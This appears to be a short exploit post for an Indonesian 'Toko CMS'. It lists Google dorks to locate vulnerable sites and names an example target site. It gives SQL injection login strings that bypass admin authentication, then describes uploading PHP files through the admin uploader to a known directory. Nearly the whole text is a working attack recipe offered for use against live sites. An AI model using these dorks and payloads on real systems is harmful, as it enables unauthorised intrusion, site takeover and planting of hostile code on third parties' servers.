[+]Exploit Title: Indonesia Toko CMS Bypass SQL Admin Login
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork:
inurl:"index.php?mnu=login"
inurl:"/ypathfile/"
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Dorking with the dork and get some vuln site
Example:
http://e-jakarta.com/index.php?mnu=login
Exploit the login details with credential like this
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
Then you will get "Alert" , Admin successfully login
Go to /index.php?mnu=admin or just click Admin
No need to write user,email,password. Go to the uploader and upload a php files
Your file will go to site/ypathfile/
Greetz: Electronic Thunderbolt Team - Giant-ps - Anonymous arabe - special for Posit1ve ( my gf )